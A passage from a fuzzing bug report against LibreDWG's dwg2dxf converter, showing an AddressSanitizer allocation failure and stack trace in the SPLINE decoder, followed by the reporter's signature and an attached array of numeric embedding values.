0x7fd780bb4000-0x7fd780bbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780bbb000-0x7fd780dba000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dba000-0x7fd780dbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbb000-0x7fd780dbc000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbc000-0x7fd780dbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780dbf000-0x7fd780fbe000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbe000-0x7fd780fbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbf000-0x7fd780fc0000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fc0000-0x7fd7811a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7811a7000-0x7fd7813a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813a7000-0x7fd7813ab000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ab000-0x7fd7813ad000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ad000-0x7fd7813b1000 0x7fd7813b1000-0x7fd78154e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78154e000-0x7fd78174d000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174d000-0x7fd78174e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174e000-0x7fd78174f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174f000-0x7fd78189f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd78189f000-0x7fd781a9f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781a9f000-0x7fd781aa2000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa2000-0x7fd781aa5000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa5000-0x7fd78270a000 0x7fd78270a000-0x7fd782731000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd78279d000-0x7fd782927000 0x7fd782927000-0x7fd782931000 0x7fd782931000-0x7fd782932000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782932000-0x7fd782933000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782933000-0x7fd782934000 0x7fffa34fe000-0x7fffa351f000 [stack] 0x7fffa35bc000-0x7fffa35bf000 [vvar] 0x7fffa35bf000-0x7fffa35c1000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==6231==End of process memory map. ==6231==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7fd781838c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7fd781857595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7fd781842492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7fd78184e8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7fd78177b8f1 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2c8f1) #5 0x7fd78177604b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2704b) #6 0x7fd78182dd00 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded00) #7 0x55f7ba79bec8 in dwg_decode_SPLINE_private ../../src/dwg.spec:1639 #8 0x55f7ba7a4e19 in dwg_decode_SPLINE ../../src/dwg.spec:1585 #9 0x55f7bab4b89b in dwg_decode_add_object ../../src/decode.c:4738 #10 0x55f7bab5ef28 in decode_R13_R2000 ../../src/decode.c:1216 #11 0x55f7bab9161a in dwg_decode ../../src/decode.c:239 #12 0x55f7ba533f7a in dwg_read_file ../../src/dwg.c:206 #13 0x55f7ba53232d in main ../../programs/dwg2dxf.c:255 #14 0x7fd780fe1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x55f7ba5332e9 in _start (/home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf+0x3e42e9) ``` Thanks, Linhlhq from Infiniti Team, VinCSS (a member of Vingroup) # # --- end body ---
5,103
[ -0.040485680103302, 0.03137174993753433, -0.00792431179434061, -0.0031077254097908735, 0.05917853116989136, 0.050653599202632904, -0.004208216443657875, 0.040516678243875504, -0.013616641983389854, 0.027543282136321068, -0.01213640347123146, 0.0008791336440481246, -0.004014468286186457, 0.008734180592000484, 0.008214934729039669, 0.01163265760987997, -0.01026866864413023, 0.011733407154679298, -0.024489805102348328, -0.03163525089621544, 0.014585384167730808, -0.008989928290247917, -0.028194276615977287, 0.027109285816550255, -0.01610437221825123, -0.0004015436861664057, 0.013399643823504448, -0.009819172322750092, -0.012888147495687008, 0.020676836371421814, 0.00597907742485404, 0.02830277569591999, 0.01579437404870987, 0.01312839612364769, 0.05105659365653992, -0.02931026741862297, 0.06838545948266983, 0.0641694888472557, 0.01788685843348503, 0.03564971685409546, -0.0007551346207037568, -0.07532940059900284, -0.020072340965270996, 0.014500134624540806, -0.001314583350904286, -0.008734180592000484, 0.015220879577100277, -0.001281646080315113, -0.004057093057781458, 0.019266346469521523, -0.021963326260447502, -0.007474815938621759, -0.03847069665789604, -0.06974944472312927, 0.011500908993184566, -0.013322144746780396, 0.03509172052145004, 0.02757428213953972, 0.010346167720854282, 0.0062968251295387745, -0.015724625438451767, 0.028504274785518646, -0.011834155768156052, 0.022288823500275612, 0.020025841891765594, 0.017948858439922333, -0.02256782166659832, 0.00606820173561573, -0.024784304201602936, -0.002913976786658168, -0.002228107303380966, -0.04212866723537445, 0.010043920017778873, 0.02191682532429695, 0.018956350162625313, -0.014934131875634193, -0.005033585242927074, 0.0019568593706935644, -0.006765696220099926, 0.011493158526718616, -0.023342814296483994, 0.04150867089629173, -0.036548711359500885, 0.012570400722324848, 0.010051670484244823, 0.0011731470003724098, -0.009214676916599274, -0.07570140063762665, 0.014236637391149998, -0.0470886267721653, -0.00083118089241907, 0.03847069665789604, 0.025853794068098068, -0.002981788944453001, 0.0018648289842531085, -0.0043593402951955795, -0.04990960285067558, -0.005548955872654915, -0.04891761392354965, 0.0003976687148679048, -0.046592630445957184, -0.00421209167689085, -0.009687422774732113, 0.011562908068299294, 0.02284681797027588, 0.020475337281823158, 0.014678383246064186, 0.002028546528890729, 0.01193490531295538, 0.11680707335472107, 0.012585899792611599, -0.0071221934631466866, -0.002735728397965431, 0.01550762727856636, 0.0005875421920791268, 0.011330409906804562, 0.028442274779081345, -0.021963326260447502, -0.06131751462817192, -0.021653328090906143, 0.006347199436277151, -0.03332473710179329, -0.02693878673017025, -0.012004654854536057, -0.03335573524236679, 0.015980374068021774, 0.016755366697907448, -0.021312331780791283, -0.009896671399474144, -0.011880655772984028, -0.027667280286550522, -0.043585654348134995, 0.012601399794220924, -0.04281065985560417, 0.02963576465845108, -0.004742962308228016, -0.04448464885354042, 0.03871869295835495, 0.02016534097492695, 0.00839318335056305, -0.057349544018507004, -0.040206681936979294, 0.02859727293252945, -0.0020382339134812355, -0.03871869295835495, 0.00749806547537446, -0.0404546782374382, 0.009524674154818058, 0.0007982436800375581, -0.0057930792681872845, -0.023823311552405357, -0.020459838211536407, 0.019111348316073418, 0.030751755461096764, 0.04501164332032204, -0.027372783049941063, 0.003388660727068782, 0.031247751787304878, 0.022769318893551826, -0.04411264881491661, 0.005878328345716, -0.012895897962152958, 0.014500134624540806, -0.03630071133375168, -0.03335573524236679, -0.012229403480887413, 0.020738836377859116, 0.01381039060652256, -0.021947825327515602, 0.02087833359837532, 0.005366832483559847, -0.0021157332230359316, 0.03186774626374245, 0.04197366535663605, -0.05803154036402702, 0.004851461388170719, -0.0036521584261208773, 0.01821235567331314, 0.0057892040349543095, -0.018103856593370438, -0.001566456281580031, 0.004642213229089975, 0.004529838915914297, 0.017018865793943405, 0.012485151179134846, -0.005250583402812481, 0.044949643313884735, 0.0011382722295820713, -0.0014279261231422424, -0.023311814293265343, -0.0056070806458592415, 0.005843453574925661, 0.000882524240296334, -0.01782485842704773, 0.01886335015296936, -0.01610437221825123, -0.0335727334022522, 0.006715321913361549, 0.026752788573503494, -0.004215966444462538, 0.002789977937936783, 0.0017757046734914184, -0.013601141981780529, 0.014360636472702026, -0.014004139229655266, -0.00033179423189722, -0.006440198980271816, 0.059798527508974075, 0.007738313637673855, -0.019343847408890724, -0.017452862113714218, -0.03394472971558571, 0.005045210011303425, 0.002972101327031851, -0.028101276606321335, 0.004502714145928621, -0.015414628200232983, 0.026458289474248886, -0.029496265575289726, -0.022490322589874268, 0.021095333620905876, 0.0012622711947187781, 0.004394215065985918, -0.009772672317922115, -0.061720509082078934, -0.004828211851418018, 0.005498581565916538, 0.02554379776120186, -0.052358586341142654, -0.005661330185830593, 0.02021184004843235, -0.0369827076792717, -0.0026001043152064085, 0.008819430135190487, -0.023311814293265343, -0.014748132787644863, -0.010330667719244957, 0.008338933810591698, -0.021312331780791283, 0.004952210932970047, 0.03630071133375168, 0.014593134634196758, -0.007257817313075066, -0.005502456333488226, 0.007005944382399321, 0.028473274782299995, -0.01718936301767826, -0.006405324209481478, -0.016925865784287453, 0.02115733176469803, 0.014763632789254189, -0.0151743795722723, 0.013159395195543766, 0.0235598124563694, 0.010973912663757801, 0.014887631870806217, 0.03166624903678894, 0.022428322583436966, -0.01921984739601612, -0.04758462309837341, 0.04197366535663605, -0.009563424624502659, -0.006017827428877354, 0.00497158570215106, 0.008385433815419674, -0.011570658534765244, -0.008850430138409138, 0.023156816139817238, -0.0027434781659394503, -0.03915268927812576, 0.039586685597896576, -0.018940849229693413, 0.0043593402951955795, -0.016708867624402046, -0.012609150260686874, 0.009299926459789276, 0.03326273709535599, -0.0068509457632899284, 0.006819945760071278, -0.02661328949034214, 0.007273317314684391, 0.017375363036990166, -0.025373298674821854, 0.03574271500110626, -0.007075693923979998, -0.020397838205099106, -0.021017832681536674, -0.02526479959487915, -0.019281847402453423, -0.020459838211536407, -0.01985534280538559, -0.0014395511243492365, -0.03682770952582359, -0.011927155777812004, -0.01062516588717699, 0.04064067825675011, 0.011586158536374569, -0.004711962770670652, -0.03633171319961548, -0.016956865787506104, -0.02453630603849888, -0.01647636853158474, 0.0008059936226345599, -0.009292175993323326, -0.0370137058198452, -0.0034952221903949976, -0.015267378650605679, 0.028380274772644043, -0.013678641989827156, -0.013360894285142422, 0.023048317059874535, -0.052978578954935074, -0.011516408994793892, -0.021684328094124794, -0.032487742602825165, -0.009842421859502792, 0.022815819829702377, -0.046282634139060974, 0.009888921864330769, 0.00790106225758791, -0.03899769112467766, 0.010609665885567665, -0.039214689284563065, 0.015887374058365822, 0.050033602863550186, -0.02760528028011322, -0.004386465065181255, 0.05322657898068428, -0.06128651276230812, 0.027806779369711876, 0.008261434733867645, -0.029837263748049736, -0.01925084739923477, -0.030224760994315147, -0.013267895206809044, -0.042221665382385254, -0.04073367640376091, 0.012562650255858898, 0.014050638303160667, -0.008137435652315617, -0.012376652099192142, 0.034502726048231125, -0.02056833729147911, -0.01226040255278349, 0.010214419104158878, -0.01811935566365719, 0.01653836853802204, -0.019436845555901527, 0.03437872603535652, -0.014027388766407967, 0.0011092099593952298, 0.05855853483080864, -0.008718680590391159, 0.026954285800457, 0.002706666011363268, -0.053071580827236176, 0.007470940705388784, -0.04553863778710365, 0.02261432074010372, -0.009137177839875221, -0.000973101647105068, -0.011508658528327942, -0.0025284173898398876, 0.0218548271805048, 0.020103340968489647, 0.0011237410362809896, -0.0126246502622962, 0.008555931970477104, 0.002749290782958269, 0.011772156693041325, -0.03061225637793541, 0.05800053849816322, -0.012678899802267551, -0.023420313373208046, -0.0201808400452137, -0.031774748116731644, 0.04141567274928093, 0.008183934725821018, -0.032177746295928955, 0.009346425533294678, -0.018289854750037193, -0.01109791174530983, 0.00015814718790352345, -0.03163525089621544, 0.027171283960342407, 0.04755362123250961, -0.016367869451642036, 0.041260674595832825, -0.014755883254110813, -0.0370137058198452, -0.006320074666291475, 0.07687938958406448, -0.006397574208676815, -0.04439164698123932, 0.014864382334053516, 0.03574271500110626, -0.026101792231202126, -0.01718936301767826, 0.016057873144745827, -0.05517956241965294, -0.004494964145123959, 0.015267378650605679, -0.023668311536312103, -0.010144669562578201, 0.032828740775585175, 0.040888674557209015, -0.004091967362910509, -0.017251363024115562, 0.02187032625079155, -0.00016395963029935956, -0.0009653517045080662, -0.01365539152175188, -0.01463963370770216, 0.0042237164452672005, 0.06900545209646225, 0.029139768332242966, 0.0019752655643969774, 0.010981663130223751, -0.03155774995684624, 0.006742446683347225, 0.002590416930615902, 0.008633431978523731, 0.013267895206809044, 0.023652812466025352, -0.00005225154018262401, 0.010051670484244823, -0.010160169564187527, 0.01821235567331314, 0.026396291330456734, -0.03878069296479225, -0.030255760997533798, 0.02052183635532856, 0.020273840054869652, 0.028674772009253502, -0.026411790400743484, -0.03568071871995926, -0.01295014750212431, -0.03639371320605278, 0.01653836853802204, 0.0015122067416086793, 0.022366322576999664, 0.0142831364646554, -0.028705772012472153, 0.0151743795722723, -0.017902357503771782, -0.03092225454747677, -0.03682770952582359, -0.01211315393447876, 0.02924826741218567, -0.04814261943101883, 0.002983726328238845, 0.012826148420572281, -0.028442274779081345, -0.006358824670314789, 0.0012138341553509235, -0.009563424624502659, -0.03067425638437271, -0.00841643288731575, 0.03933868929743767, 0.01041591726243496, -0.0109506631270051, 0.024009309709072113, -0.018770352005958557, -0.01077241450548172, 0.016367869451642036, 0.03558771684765816, 0.04343065619468689, -0.025466298684477806, 0.0075406902469694614, 0.008563682436943054, 0.009532424621284008, 0.006823820993304253, 0.003537846961989999, -0.0032549742609262466, 0.0022184199187904596, 0.04098167642951012, -0.0044290898367762566, -0.016011372208595276, -0.029496265575289726, -0.009013178758323193, -0.009059677831828594, -0.014949631877243519, 0.0026194793172180653, -0.03157325088977814, 0.033169735223054886, -0.015538626350462437, 0.039276689291000366, 0.012182903476059437, 0.02284681797027588, 0.0336967334151268, 0.020661335438489914, 0.011903905309736729, -0.0252802986651659, -0.042903658002614975, -0.003948593512177467, 0.027527781203389168, -0.002954664174467325, -0.021947825327515602, 0.0404546782374382, 0.020692335441708565, 0.03245674446225166, -0.013221395201981068, 0.03220874443650246, -0.007137693464756012, 0.020459838211536407, 0.006808320991694927, -0.033200737088918686, -0.004270215984433889, -0.001907453639432788, -0.047026626765728, 0.009299926459789276, -0.03138725087046623, 0.02287781797349453, -0.05149058997631073, 0.00506071001291275, -0.01464738417416811, 0.003092225408181548, 0.0003710283199325204, 0.0024373556952923536, 0.0024896678514778614, -0.0109506631270051, -0.03967968374490738, -0.006940070074051619, 0.023776810616254807, 0.004332215525209904, 0.013794890604913235, 0.008106435649096966, -0.01366314198821783, 0.02621029131114483, -0.0335727334022522, -0.010570916347205639, -0.0009140083566308022, -0.024040309712290764, 0.02625679224729538, -0.00698269484564662, 0.026070794090628624, -0.014709383249282837, 0.03527772054076195, -0.01142340898513794, -0.007672439329326153, -0.03400672972202301, 0.0235598124563694, -0.04175666719675064, 0.0031968497205525637, 0.0029081644024699926, 0.019374845549464226, -0.005707829724997282, 0.018971849232912064, 0.005312582943588495, -0.010966163128614426, -0.014709383249282837, 0.0033654107246547937, -0.010369418188929558, 0.010144669562578201, -0.014112638309597969, 0.009563424624502659, -0.015058130957186222, -0.018289854750037193, 0.0168483667075634, -0.0005366832483559847, 0.013182645663619041, -0.013012146577239037, 0.024009309709072113, -0.006064326968044043, 0.004948335699737072, 0.007389566395431757, 0.0012041466543450952, 0.020785335451364517, -0.057349544018507004, -0.031805746257305145, 0.014709383249282837, 0.00020440462685655802, 0.01160165760666132, -0.006943944841623306, -0.028209775686264038, 0.005176959093660116, -0.012299152091145515, 0.0024702928494662046, -0.006742446683347225, -0.030503757297992706, 0.00036570022348314524, -0.053350575268268585, -0.007110568694770336, 0.02289331890642643, 0.02089383453130722, -0.022707320749759674, -0.001398863852955401, 0.0008650869131088257, 0.03158874809741974, -0.009144927375018597, 0.015360378660261631, 0.0021176706068217754, -0.001648799399845302, -0.0056070806458592415, 0.01585637405514717, 0.008083186112344265, -0.009323175996541977, -0.000053613832278642803, -0.010485666804015636, -0.009648673236370087, -0.010578665882349014, 0.02693878673017025, 0.022645320743322372, -0.04904161021113396, -0.04002068191766739, 0.015616126358509064, 0.01298114750534296, -0.009020928293466568, -0.026194792240858078, 0.009927671402692795, 0.03161974996328354, 0.013415143825113773, 0.05657454952597618, -0.0007459315820597112, 0.022645320743322372, -0.0023036692291498184, 0.0064091989770531654, 0.010214419104158878, -0.032146744430065155, 0.01915784738957882, 0.0028694146312773228, -0.0236373133957386, 0.010485666804015636, 0.005142084322869778, 0.01616637222468853, 0.03540172055363655, 0.009726173244416714, -0.006610697600990534, -0.016367869451642036, -0.0006190263666212559, -0.02993026189506054, 0.0167863667011261, 0.0072423177771270275, -0.017731860280036926, -0.02083183452486992, 0.030906755477190018, 0.033169735223054886, 0.02662878856062889, -0.013694141060113907, 0.012120903469622135, 0.004138467367738485, -0.004994835238903761, -0.004277965985238552, 0.014600884169340134, -0.016321370378136635, 0.008044436573982239, -0.004839836619794369, 0.021095333620905876, 0.04854561388492584, 0.054404567927122116, -0.017592361196875572, -0.00689357053488493, -0.004080342594534159, 0.018646351993083954, 0.01957634463906288, 0.0021622327622026205, 0.03540172055363655, 0.03630071133375168, 0.026504790410399437, 0.021668829023838043, -0.003446785267442465, -0.0014870194718241692, -0.04141567274928093, 0.009571174159646034, 0.003440972650423646, 0.0044097150675952435, -0.02991476282477379, 0.004820461850613356, 0.015887374058365822, 0.01818135567009449, -0.0027744779363274574, -0.000754165870603174, -0.0017437362112104893, -0.005014210008084774, -0.013167145662009716, -0.008803930133581161, 0.019405845552682877, 0.02994576282799244, -0.01213640347123146, 0.003266599029302597, -0.0037412827368825674, -0.0065486980602145195, 0.010811164043843746, -0.012725398875772953, -0.024412306025624275, 0.005847328808158636, -0.0004153482732363045, -0.002646604087203741, -0.01610437221825123, -0.028535272926092148, 0.01847585290670395, -0.011314909905195236, 0.014368386007845402, 0.013027646578848362, 0.03850169479846954, -0.019638344645500183, 0.042903658002614975, -0.030891254544258118, -0.019452346488833427, 0.004905710928142071, -0.023513313382864, 0.0009256332996301353, 0.003946656361222267, -0.01816585659980774, 0.02292431890964508, 0.01378714106976986, -0.013895640149712563, -0.00596745265647769, 0.024691304191946983, 0.013244644738733768, -0.011477658525109291, 0.0076065645553171635, -0.026024293154478073, 0.00698269484564662, 0.002280419459566474, -0.023048317059874535, 0.012880397960543633, 0.01463963370770216, -0.004150092136114836, 0.006792820990085602, -0.011198661290109158, -0.03971068561077118, 0.006936194840818644, -0.049010612070560455, 0.00039669996476732194, -0.022955317050218582, 0.0031929747201502323, 0.00023443564714398235, -0.003311161184683442, 0.009423925541341305, 0.016445370391011238, -0.024799803271889687, 0.022335322573781013, 0.016615867614746094, -0.03806769847869873, 0.016026873141527176, 0.023451313376426697, -0.017034364864230156, 0.005033585242927074, 0.01243865117430687, -0.0018396417144685984, 0.013825890608131886, 0.02895377017557621, -0.02250582166016102, -0.007935937494039536, 0.011655907146632671, 0.008966678753495216, -0.0021099208388477564, -0.017607860267162323, 0.029418766498565674, 0.004622838459908962, 0.013422893360257149, 0.0006204794626682997, -0.020242840051651, -0.002848102478310466, -0.013391893357038498, 0.026768287643790245, -0.027760280296206474, 0.008796180598437786, -0.014352886006236076, -0.03394472971558571, 0.03747870400547981, -0.00957892369478941, 0.02259882166981697, 0.043244656175374985, -0.01847585290670395, 0.004560838919132948, -0.04064067825675011, 0.014655133709311485, 0.00278222793713212, 0.03196074813604355, -0.003119350178167224, -0.014430386014282703, -0.005940327886492014, 0.010214419104158878, -0.008145185187458992, 0.01655386947095394, 0.003979593515396118, 0.030085261911153793, 0.013887889683246613, -0.01463963370770216, -0.004060967825353146, -0.03267374262213707, 0.005804704036563635, -0.0013552705058827996, -0.0033150361850857735, 0.0404236800968647, -0.011694657616317272, -0.0008326340466737747, 0.018708351999521255, 0.003704470582306385, -0.009067428298294544, 0.03949368745088577, -0.018971849232912064, -0.0059984526596963406, -0.01748386211693287, 0.021312331780791283, 0.00892792921513319, -0.021746328100562096, -0.03270474076271057, 0.04119867458939552, -0.026690788567066193, -0.04138467088341713, -0.033541735261678696, -0.007412816397845745, -0.024706803262233734, -0.026458289474248886, 0.02700078673660755, -0.022769318893551826, 0.020800834521651268, -0.00000426095266448101, -0.001745673711411655, 0.012686649337410927, 0.03760270029306412, -0.003950531128793955, -0.005583830643445253, 0.004456214606761932, -0.0029798513278365135, -0.001392082660458982, 0.024443306028842926, -0.02487730234861374, 0.010516666807234287, 0.0004979335353709757, -0.046902626752853394, -0.008021186105906963, -0.023699311539530754, 0.012671149335801601, 0.002943039173260331, 0.025016801431775093, 0.0008205247577279806, 0.000383379781851545, 0.0020537336822599173, -0.011748907156288624, 0.006599072832614183, 0.01847585290670395, 0.0252957995980978, 0.01853785291314125, -0.004262465983629227, -0.00307866302318871, 0.04792562127113342, -0.016042372211813927, -0.005215708632022142, -0.008648931048810482, 0.0066184476017951965, -0.01957634463906288, -0.021389830857515335, -0.02290881797671318, 0.010346167720854282, 0.013019897043704987, 0.010981663130223751, 0.044639647006988525, 0.018336353823542595, -0.015189879573881626, 0.004382590297609568, 0.0013891764683648944, 0.011229661293327808, 0.022149324417114258, -0.0023869811557233334, 0.011694657616317272, -0.01178765669465065, 0.03310773894190788, -0.01164040807634592, 0.004010593052953482, -0.004816586617380381, 0.017328862100839615, 0.021048832684755325, -0.024117808789014816, -0.038873691111803055, 0.012609150260686874, -0.03208474442362785, -0.03971068561077118, -0.01824335567653179, 0.007137693464756012, -0.002009171526879072, -0.015437877736985683, -0.033789731562137604, -0.007451565936207771, -0.009299926459789276, 0.028116777539253235, 0.0404236800968647, -0.006238700356334448, -0.008734180592000484, -0.005138209089636803, 0.017390862107276917, 0.006757946219295263, -0.05815554037690163, 0.009005428291857243, -0.011020412668585777, -0.014546634629368782, -0.015306128188967705, 0.00034051292459480464, 0.014190137386322021, -0.054342567920684814, -0.029511766508221626, 0.03220874443650246, 0.027481282129883766, -0.020676836371421814, -0.013616641983389854, -0.04200466722249985, -0.01686386577785015, -0.016708867624402046, -0.0029333517886698246, 0.026768287643790245, -0.018057357519865036, 0.003510722192004323, -0.022691819816827774, 0.04284166172146797, 0.006099201738834381, 0.001424051239155233, 0.013926639221608639, -0.0007333379471674562, -0.0014356761239469051, 0.014763632789254189, -0.03095325455069542, -0.010369418188929558, 0.0066843219101428986, -0.026039794087409973, 0.000798728025984019, 0.01655386947095394, 0.022118324413895607, 0.0034157854970544577, 0.006909070070832968, -0.025745294988155365, 0.007629814557731152, -0.0020111091434955597, -0.025094300508499146, -0.014562134630978107, 0.0010452729184180498, -0.009191427379846573, -0.0061805760487914085, -0.006909070070832968, 0.0021544829942286015, 0.040888674557209015, 0.005173083860427141, 0.030426258221268654, -0.001566456281580031, -0.004700337536633015, 0.0013262082356959581, -0.013314394280314445, -0.027868779376149178, -0.014709383249282837, 0.016042372211813927, 0.026101792231202126, -0.00775381363928318, 0.0011934905778616667, -0.004239216446876526, -0.012911397963762283, -0.01653836853802204, -0.00033227860694751143, -0.01785585843026638, -0.030767256394028664, -0.01145440898835659, -0.008052186109125614, -0.00960992369800806, -0.011190910823643208, 0.023110317066311836, -0.018274355679750443, 0.001578081282787025, -0.006215450819581747, 0.02965126559138298, 0.0018997036386281252, 0.01649186946451664, -0.01779385842382908, -0.006707571912556887, 0.005812454037368298, 0.02960476465523243, -0.057349544018507004, -0.009966420941054821, -0.0048669613897800446, -0.007625939324498177, -0.018708351999521255, 0.009749422781169415, 0.01398088876157999, 0.011849655769765377, -0.016073372215032578, 0.02148282900452614, -0.02121933177113533, -0.025853794068098068, -0.002107983222231269, 0.025001302361488342, -0.03329373523592949, 0.0336347334086895, 0.011865155771374702, 0.002762853167951107, -0.023079317063093185, -0.021296830847859383, 0.0201808400452137, 0.021746328100562096, -0.012888147495687008, 0.007815812714397907, 0.007370191626250744, 0.00521958339959383, 0.019638344645500183, -0.03394472971558571, 0.000586089096032083, 0.006424698978662491, -0.002299794228747487, -0.018103856593370438, -0.014600884169340134, 0.014546634629368782, -0.026008794084191322, -0.02118833176791668, 0.01312839612364769, -0.009478175081312656, -0.011237410828471184, -0.0013794890837743878, -0.009470424614846706, 0.02424180693924427, -0.009307675994932652, -0.016445370391011238, -0.007529065478593111, 0.009974170476198196, 0.0371377058327198, -0.01985534280538559, 0.015158879570662975, -0.024071309715509415, -0.024675805121660233, 0.011376909911632538, 0.02290881797671318, 0.037199705839157104, -0.00889692921191454, -0.001243865117430687, -0.01653836853802204, -0.001526737934909761, 0.01821235567331314, 0.021343329921364784, -0.004022218286991119, -0.007823563180863857, 0.026473790407180786, 0.005289332941174507, -0.004572463687509298, 0.010787914507091045, 0.00926117692142725, 0.0033925354946404696, -0.025714296847581863, -0.015577376820147038, 0.016042372211813927, -0.02760528028011322, -0.02520279958844185, 0.010834414511919022, 0.046344634145498276, 0.0013203957350924611, -0.017421862110495567, 0.0022571696899831295, -0.005920953117311001, 0.017003364861011505, 0.005614830646663904, 0.002005296526476741, 0.015918374061584473, -0.037261705845594406, 0.03834669664502144, -0.00011043662379961461, 0.05759754404425621, -0.030751755461096764, -0.020289339125156403, 0.003909843973815441, -0.009199176914989948, -0.02427280694246292, 0.004324465524405241, -0.0201808400452137, -0.01715836301445961, -0.015313878655433655, 0.015282878652215004, -0.021823827177286148, -0.02464480511844158, -0.009113927371799946, -0.01622837223112583, 0.021405329927802086, 0.0041113425977528095, 0.0031658499501645565, 0.005366832483559847, 0.03098425455391407, -0.00824593473225832, -0.005293208174407482, 0.0504366010427475, -0.014205637387931347, 0.008803930133581161, 0.0007221974083222449, -0.010935163125395775, -0.02656678855419159, 0.0010103982640430331, -0.009532424621284008, -0.014120387844741344, 0.03270474076271057, -0.029899263754487038, 0.01261689979583025, 0.02121933177113533, -0.01176440715789795, 0.023807810619473457, -0.009237926453351974, -0.023730311542749405, -0.01714286394417286, 0.009230176918208599, -0.00943167507648468, -0.01853785291314125, -0.020475337281823158, 0.013089646585285664, 0.10161719471216202, -0.030906755477190018, 0.007656939327716827, -0.01749936118721962, 0.018630852922797203, 0.009191427379846573, -0.0029527265578508377, 0.015213129110634327, -0.013012146577239037, -0.004832086618989706, 0.008695431053638458, -0.006320074666291475, -0.009547924622893333, 0.0001410731056239456, 0.02898477017879486, -0.0007817750447429717, -0.017778359353542328, -0.014252137392759323, 0.03744770213961601, -0.006192200817167759, 0.015205379575490952, -0.0012157716555520892, 0.013143896125257015, -0.010764664970338345, 0.02664428949356079, -0.019297346472740173, -0.01146215945482254, -0.0235288143157959, -0.025869295001029968, -0.021265830844640732, 0.006486698519438505, -0.010284168645739555, -0.02118833176791668, -0.003940843977034092, 0.00940842553973198, 0.009454924613237381, 0.019622843712568283, 0.010384917259216309, -0.0052350834012031555, 0.002797727705910802, 0.0012138341553509235, -0.01029966864734888, -0.0185068529099226, -0.010074920020997524, 0.00766468932852149, -0.0038497820496559143, 0.03760270029306412, 0.002121545607224107, -0.018320854753255844, -0.013283394277095795, 0.010508916340768337, -0.01619737222790718, 0.035525716841220856, 0.009478175081312656, 0.009958671405911446, 0.03444072604179382, 0.003995093517005444, -0.01109791174530983, -0.013469393365085125, -0.022071825340390205, -0.008191685192286968, 0.012531650252640247, -0.023063817992806435, -0.013066396117210388, 0.00513045908883214, -0.006370449438691139, -0.01918884739279747, 0.007966936565935612, -0.016584867611527443, 0.03166624903678894, 0.015096880495548248, 0.010896413587033749, -0.0007125099655240774, -0.007098943926393986, 0.01889435015618801, 0.008400933817029, 0.013942139223217964, 0.020971333608031273, -0.01819685660302639, -0.015244129113852978, 0.03980368375778198, 0.026380790397524834, -0.004576338920742273, 0.027155784890055656, -0.012694398872554302, 0.02492380328476429, -0.01925084739923477, -0.014430386014282703, 0.0052350834012031555, -0.004657713230699301, 0.00444846460595727, 0.005444332025945187, 0.017685359343886375, 0.004785587079823017, 0.0017834545578807592, 0.0303022600710392, 0.025001302361488342, -0.012043404392898083, -0.01584087498486042, -0.018289854750037193, -0.007207443006336689, -0.011035912670195103, 0.015693625435233116, -0.015461127273738384, -0.0008384464890696108, 0.006405324209481478, -0.0025826669298112392, 0.021761827170848846, 0.023032817989587784, -0.023838810622692108, -0.031061753630638123, -0.026861287653446198, 0.01619737222790718, 0.011903905309736729, 0.0038730318192392588, 0.03803669661283493, 0.00892792921513319, -0.015902873128652573, -0.019607344642281532, -0.033851731568574905, -0.00597907742485404, -0.032549742609262466, 0.0371377058327198, -0.026783786714076996, -0.008121935650706291, -0.0007653064094483852, -0.00766468932852149, -0.01681736670434475, 0.022970817983150482, 0.0218548271805048, 0.03425472974777222, 0.01315164566040039, 0.0037858448922634125, -0.015368128195405006, 0.021389830857515335, -0.012632399797439575, 0.014298636466264725, 0.01348489336669445, -0.0084241833537817, 0.0010443042265251279, -0.015344878658652306, 0.03172824904322624, 0.026318790391087532, -0.003477785037830472, 0.0019733281806111336, 0.0029488515574485064, 0.015732375904917717, 0.0061147017404437065, 0.007982436567544937, 0.033200737088918686, 0.010811164043843746, -0.01711186394095421, 0.011384659446775913, 0.020382339134812355, 0.0073081920854747295, 0.012903647497296333, 0.012384401634335518, -0.014500134624540806, 0.00766468932852149, 0.002958538942039013, 0.014228886924684048, -0.01649186946451664, 0.002530355006456375, -0.008199434727430344, -0.011516408994793892, 0.02659778855741024, -0.0014899256639182568, -0.050467599183321, -0.009354175999760628, 